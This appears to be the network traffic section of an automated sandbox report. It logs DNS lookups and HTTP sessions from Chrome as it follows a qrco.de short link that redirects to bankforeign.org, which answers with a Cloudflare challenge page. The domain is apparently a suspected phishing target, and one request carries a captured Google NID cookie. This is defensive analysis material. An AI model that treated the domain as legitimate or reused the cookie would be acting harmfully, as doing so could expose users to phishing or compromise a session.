                                                            Feb 1, 2024 21:38:10.458594084 CET53533531.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:10.459647894 CET53528381.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:11.055800915 CET6536653192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:11.059817076 CET5912053192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:11.179037094 CET53653661.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:11.184204102 CET53591201.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:11.693922997 CET5936153192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:11.695029020 CET4968753192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:11.815742016 CET53496871.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:11.948445082 CET5889453192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:11.949585915 CET5316853192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:12.019469976 CET53593611.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:12.067965031 CET53531681.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:12.068485975 CET53588941.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:13.334239960 CET5728753192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:13.335026979 CET6509653192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:13.451487064 CET53572871.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:13.452989101 CET53650961.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:21.979360104 CET138138192.168.2.4192.168.2.255
                                                            Feb 1, 2024 21:38:24.414385080 CET53573981.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:43.282022953 CET53498521.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:47.628484011 CET53501751.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:39:05.879806042 CET53604121.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:39:05.888693094 CET53584531.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:39:09.936285973 CET6003953192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:39:09.937974930 CET5998253192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:39:10.053540945 CET53600391.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.054929972 CET53599821.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Feb 1, 2024 21:38:06.295859098 CET192.168.2.41.1.1.10xcd18Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.296331882 CET192.168.2.41.1.1.10x16bbStandard query (0)clients2.google.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.296957970 CET192.168.2.41.1.1.10xc54eStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.297266960 CET192.168.2.41.1.1.10xd1bfStandard query (0)accounts.google.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:08.354418039 CET192.168.2.41.1.1.10xcab7Standard query (0)qrco.deA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:08.354654074 CET192.168.2.41.1.1.10x4578Standard query (0)qrco.de65IN (0x0001)false
                                                            Feb 1, 2024 21:38:09.079020977 CET192.168.2.41.1.1.10x764Standard query (0)bankforeign.orgA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:09.080130100 CET192.168.2.41.1.1.10x7357Standard query (0)bankforeign.org65IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.083065987 CET192.168.2.41.1.1.10xd41bStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.084863901 CET192.168.2.41.1.1.10xce05Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.341320038 CET192.168.2.41.1.1.10xc73dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.342251062 CET192.168.2.41.1.1.10xf777Standard query (0)www.google.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.055800915 CET192.168.2.41.1.1.10xcd7aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.059817076 CET192.168.2.41.1.1.10x8086Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.693922997 CET192.168.2.41.1.1.10xb7e1Standard query (0)bankforeign.orgA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.695029020 CET192.168.2.41.1.1.10xba48Standard query (0)bankforeign.org65IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.948445082 CET192.168.2.41.1.1.10xe7e8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.949585915 CET192.168.2.41.1.1.10xf642Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:13.334239960 CET192.168.2.41.1.1.10xc3cdStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:13.335026979 CET192.168.2.41.1.1.10x28aaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Feb 1, 2024 21:39:09.936285973 CET192.168.2.41.1.1.10xa204Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:39:09.937974930 CET192.168.2.41.1.1.10xa90cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Feb 1, 2024 21:38:06.413469076 CET1.1.1.1192.168.2.40xcd18No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.413469076 CET1.1.1.1192.168.2.40xcd18No error (0)clients.l.google.com172.217.215.139A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.413469076 CET1.1.1.1192.168.2.40xcd18No error (0)clients.l.google.com172.217.215.113A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.413469076 CET1.1.1.1192.168.2.40xcd18No error (0)clients.l.google.com172.217.215.101A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.413469076 CET1.1.1.1192.168.2.40xcd18No error (0)clients.l.google.com172.217.215.100A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.413469076 CET1.1.1.1192.168.2.40xcd18No error (0)clients.l.google.com172.217.215.102A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.413469076 CET1.1.1.1192.168.2.40xcd18No error (0)clients.l.google.com172.217.215.138A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.413501024 CET1.1.1.1192.168.2.40x16bbNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                            Feb 1, 2024 21:38:06.414499998 CET1.1.1.1192.168.2.40xc54eNo error (0)accounts.google.com64.233.185.84A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:08.486990929 CET1.1.1.1192.168.2.40xcab7No error (0)qrco.de108.157.162.84A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:08.486990929 CET1.1.1.1192.168.2.40xcab7No error (0)qrco.de108.157.162.14A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:08.486990929 CET1.1.1.1192.168.2.40xcab7No error (0)qrco.de108.157.162.8A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:08.486990929 CET1.1.1.1192.168.2.40xcab7No error (0)qrco.de108.157.162.56A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:09.373353958 CET1.1.1.1192.168.2.40x764No error (0)bankforeign.org104.21.73.88A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:09.373353958 CET1.1.1.1192.168.2.40x764No error (0)bankforeign.org172.67.128.122A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:09.375652075 CET1.1.1.1192.168.2.40x7357No error (0)bankforeign.org65IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.200758934 CET1.1.1.1192.168.2.40xd41bNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.458594084 CET1.1.1.1192.168.2.40xc73dNo error (0)www.google.com108.177.122.106A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.458594084 CET1.1.1.1192.168.2.40xc73dNo error (0)www.google.com108.177.122.103A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.458594084 CET1.1.1.1192.168.2.40xc73dNo error (0)www.google.com108.177.122.99A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.458594084 CET1.1.1.1192.168.2.40xc73dNo error (0)www.google.com108.177.122.147A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.458594084 CET1.1.1.1192.168.2.40xc73dNo error (0)www.google.com108.177.122.104A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.458594084 CET1.1.1.1192.168.2.40xc73dNo error (0)www.google.com108.177.122.105A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:10.459647894 CET1.1.1.1192.168.2.40xf777No error (0)www.google.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.179037094 CET1.1.1.1192.168.2.40xcd7aNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.179037094 CET1.1.1.1192.168.2.40xcd7aNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.184204102 CET1.1.1.1192.168.2.40x8086No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:11.815742016 CET1.1.1.1192.168.2.40xba48No error (0)bankforeign.org65IN (0x0001)false
                                                            Feb 1, 2024 21:38:12.019469976 CET1.1.1.1192.168.2.40xb7e1No error (0)bankforeign.org104.21.73.88A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:12.019469976 CET1.1.1.1192.168.2.40xb7e1No error (0)bankforeign.org172.67.128.122A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:12.067965031 CET1.1.1.1192.168.2.40xf642No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:12.068485975 CET1.1.1.1192.168.2.40xe7e8No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:12.068485975 CET1.1.1.1192.168.2.40xe7e8No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:13.451487064 CET1.1.1.1192.168.2.40xc3cdNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:13.451487064 CET1.1.1.1192.168.2.40xc3cdNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:13.452989101 CET1.1.1.1192.168.2.40x28aaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Feb 1, 2024 21:38:24.240055084 CET1.1.1.1192.168.2.40x3fa5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Feb 1, 2024 21:38:24.240055084 CET1.1.1.1192.168.2.40x3fa5No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:36.452600002 CET1.1.1.1192.168.2.40x4668No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Feb 1, 2024 21:38:36.452600002 CET1.1.1.1192.168.2.40x4668No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:38:58.388539076 CET1.1.1.1192.168.2.40x117dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Feb 1, 2024 21:38:58.388539076 CET1.1.1.1192.168.2.40x117dNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:39:10.053540945 CET1.1.1.1192.168.2.40xa204No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                            Feb 1, 2024 21:39:18.873756886 CET1.1.1.1192.168.2.40xa94fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Feb 1, 2024 21:39:18.873756886 CET1.1.1.1192.168.2.40xa94fNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                            • clients2.google.com
                                                            • accounts.google.com
                                                            • qrco.de
                                                            • bankforeign.org
                                                            • https:
                                                              • challenges.cloudflare.com
                                                            • a.nel.cloudflare.com
                                                            • fs.microsoft.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449730172.217.215.1394433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:06 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                            Host: clients2.google.com
                                                            Connection: keep-alive
                                                            X-Goog-Update-Interactivity: fg
                                                            X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                            X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:06 UTC732INHTTP/1.1 200 OK
                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GAfya987eGVVn6xyrGdeIQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Thu, 01 Feb 2024 20:38:06 GMT
                                                            Content-Type: text/xml; charset=UTF-8
                                                            X-Daynum: 6240
                                                            X-Daystart: 45486
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: GSE
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Accept-Ranges: none
                                                            Vary: Accept-Encoding
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            2024-02-01 20:38:06 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 34 30 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 34 35 34 38 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                            Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6240" elapsed_seconds="45486"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                            2024-02-01 20:38:06 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                            Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                            2024-02-01 20:38:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.44973164.233.185.844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:06 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                            Host: accounts.google.com
                                                            Connection: keep-alive
                                                            Content-Length: 1
                                                            Origin: https://www.google.com
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
                                                            2024-02-01 20:38:06 UTC1OUTData Raw: 20
                                                            Data Ascii:
                                                            2024-02-01 20:38:06 UTC1799INHTTP/1.1 200 OK
                                                            Content-Type: application/json; charset=utf-8
                                                            Access-Control-Allow-Origin: https://www.google.com
                                                            Access-Control-Allow-Credentials: true
                                                            X-Content-Type-Options: nosniff
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Thu, 01 Feb 2024 20:38:06 GMT
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Vc3UCRekFVoCq1QjNdWbrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmLw1JBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQBiIR6OdU0f1rIJXLh_s4MZALa4F8M"
                                                            Server: ESF
                                                            X-XSS-Protection: 0
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Accept-Ranges: none
                                                            Vary: Accept-Encoding
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            2024-02-01 20:38:06 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                            Data Ascii: 11["gaia.l.a.r",[]]
                                                            2024-02-01 20:38:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449734108.157.162.844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:08 UTC656OUTGET /belJ9F HTTP/1.1
                                                            Host: qrco.de
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:09 UTC525INHTTP/1.1 302 Moved Temporarily
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Thu, 01 Feb 2024 20:18:18 GMT
                                                            Server: nginx
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            Location: https://bankforeign.org/
                                                            X-Cache: Hit from cloudfront
                                                            Via: 1.1 ad49ff8ff03d68efb9eb939751d77c56.cloudfront.net (CloudFront)
                                                            X-Amz-Cf-Pop: MIA3-P3
                                                            X-Amz-Cf-Id: ISdqaUZJLSCDyArXpmOsNPyhiRK_2ZRXnMufXu2fQrdJiLTI6YL70A==
                                                            Age: 1191
                                                            2024-02-01 20:38:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.449738104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:09 UTC658OUTGET / HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:09 UTC1355INHTTP/1.1 403 Forbidden
                                                            Date: Thu, 01 Feb 2024 20:38:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 13690
                                                            Connection: close
                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Resource-Policy: same-origin
                                                            Origin-Agent-Cluster: ?1
                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            Referrer-Policy: same-origin
                                                            X-Frame-Options: SAMEORIGIN
                                                            cf-mitigated: challenge
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XWonk4WN1fK11FFTlQAyh5jVGD5LFYIuZ6cyrtPkH5WgwrJJZ6GQ6PQqhS7tgzMVD%2FJPbrnp1dK97yUgyQFNns5HCnxhVvorXpveZxyHEpk%2FOWfQ6IW6or1db8YkiaLJSXI%3D"}],"group":"cf-nel","max_age":604800}
                                                            2024-02-01 20:38:09 UTC149INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 34 65 63 66 66 31 37 37 38 63 33 36 37 36 36 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84ecff1778c36766-ATLalt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:09 UTC1234INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
